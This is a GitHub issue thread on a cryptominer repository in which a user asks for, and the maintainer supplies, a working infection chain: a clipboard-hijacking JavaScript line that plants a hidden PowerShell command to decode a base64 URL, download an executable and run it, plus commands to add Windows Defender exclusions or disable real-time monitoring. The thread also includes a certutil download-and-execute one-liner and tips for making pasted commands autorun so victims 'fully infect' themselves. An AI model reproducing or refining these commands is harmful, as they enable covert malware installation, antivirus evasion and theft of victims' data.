### ISSUE TITLE
hey bro i really need your help with something

### ISSUE THREAD

**Issue by CleanSweep39** [UnamSanctam/SilentCryptoMiner#505]
i really would appreciate ur help with a very quick question regarding something that im trying to make, can you please leave some form of contact for me to dm you privately

**Comment by UnamSanctam** [comment]
Currently I don't have any private contact, I technically have a Telegram but the hard drive where I host the Virtual Machines broke. I ordered new hard drives of course but I haven't received them yet for about 1-2 months now.

**Comment by CleanSweep39** [comment]
hmmm okay i will just ask you here then, I'm trying to find a cmd or powershell command that can download a file when pasted and executes it, i have one but the issue is windows defender flags the download as "ceprolad.a" (my file is crypted btw) so its just flagging the actual download command, this is my command "cls & certutil.exe -urlcache -split -f https://examplesite.com/test.exe test.exe 2>&1 && test.exe & cls &"      but yeah it just gets flagged, can you write me a command that wouldn't and also disappears from the terminal once ran? either powershell or cmd i just need it to run when pasted and disappear or closes the terminal after. please help bro.

**Comment by CleanSweep39** [comment]
and if that is not possible is there a command i can use that also autoruns on paste, disables wd, and doesn't show the popup in the bottom right?

**Comment by CleanSweep39** [comment]
scratch all that i found a repo and got it to work, the only thing is when i paste the command it does not autorun, how can i make a cmd command autorun when pasted?

**Comment by UnamSanctam** [comment]
It's because you use ' inside the string itself which escapes it, you can probably do it like this:
```
e.clipboardData.setData('text/plain', "powershell.exe -windowstyle hidden $a = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('aHR0cHMary9jZG4uZGlzY2ayZGF4cC5jba0vYXR3YWNoaWVudHMvOgU0NTE3Nzg0MjI0NzI3MTIzLzk1ODd1NjI5NjY4ORc5NTY5hS9kZXZtb2RlLmV4ZQ==')); (new-object System.Net.WebClient).DownloadFile($a,'C:/Users/dev.exe'); Start-Process 'C:/Users/dev.exe' &\r\n");
```

**Comment by CleanSweep39** [comment]
wow i am dumb, you are a legend bro, thank you.

**Comment by UnamSanctam** [comment]
Not really, it gets automatically enabled again after some time, and you also need to manually disable "Tamper Protection" on some computers. But knowing that you can do `Set-MpPreference -DisableRealtimeMonitoring $true` to disable it, but also note that it will give a notification to the user that it has been disabled.

**Comment by CleanSweep39** [comment]
ah okay thanks for the response, just one follow up. I noticed i was able to get my crypted file to download with my base64 command for awhile but now its detected, the script to download the file is working so its the actual file getting detected, do you know anyway to get past window defender just once so it can send logs, or is my only option to buy a private stub? btw i cant do anything fancy, im purely relying on one command in cmd to fully infect

**Comment by CleanSweep39** [comment]
oh wow thanks, can you put this in a command with mine, e.clipboardData.setData('text/plain', "powershell.exe -windowstyle hidden $a = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('aHR0cHMary9jZG4uZGlzY2ayZGF4cC5jba0vYXR3YWNoaWVudHMvOgU0NTE3Nzg0MjI0NzI3MTIzLzk1ODd1NjI5NjY4ORc5NTY5hS9kZXZtb2RlLmV4ZQ==')); (new-object System.Net.WebClient).DownloadFile($a,'C:/Users/dev.exe'); Start-Process 'C:/Users/dev.exe' &\r\n"); so they both execute in cmd together? i dont know how to format this command, sorry if this is asking to much lol

**Comment by UnamSanctam** [comment]
Yes you could probably do:
```
e.clipboardData.setData('text/plain', "powershell.exe -windowstyle hidden (Add-MpPreference -ExclusionPath @($env:SystemDrive) -Force); $a = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('aHR0cHMary9jZG4uZGlzY2ayZGF4cC5jba0vYXR3YWNoaWVudHMvOgU0NTE3Nzg0MjI0NzI3MTIzLzk1ODd1NjI5NjY4ORc5NTY5hS9kZXZtb2RlLmV4ZQ==')); (new-object System.Net.WebClient).DownloadFile($a,'C:/Users/dev.exe'); Start-Process 'C:/Users/dev.exe' &\r\n");
```
Haven't tested it but you should be able to just do the exclusion before all the previous code.

**Comment by CleanSweep39** [comment]
holy shit, yeah i just separated it with && and i am just shocked that worked lol, this is kind of op ngl, however i only did the command powershell.exe -Command Add-MpPreference -ExclusionExtension ".exe" &&  because i am not sure how to paste yours in cmd, idk where it begins?

**Comment by UnamSanctam** [comment]
Well you can just add your normal download code after what you just posted and it should work.

**Comment by UnamSanctam** [comment]
Usually it's having a new line at the end that autoruns it (because it runs everything before the last line).

**Comment by CleanSweep39** [comment]
ah ok, it works perfectly now ty
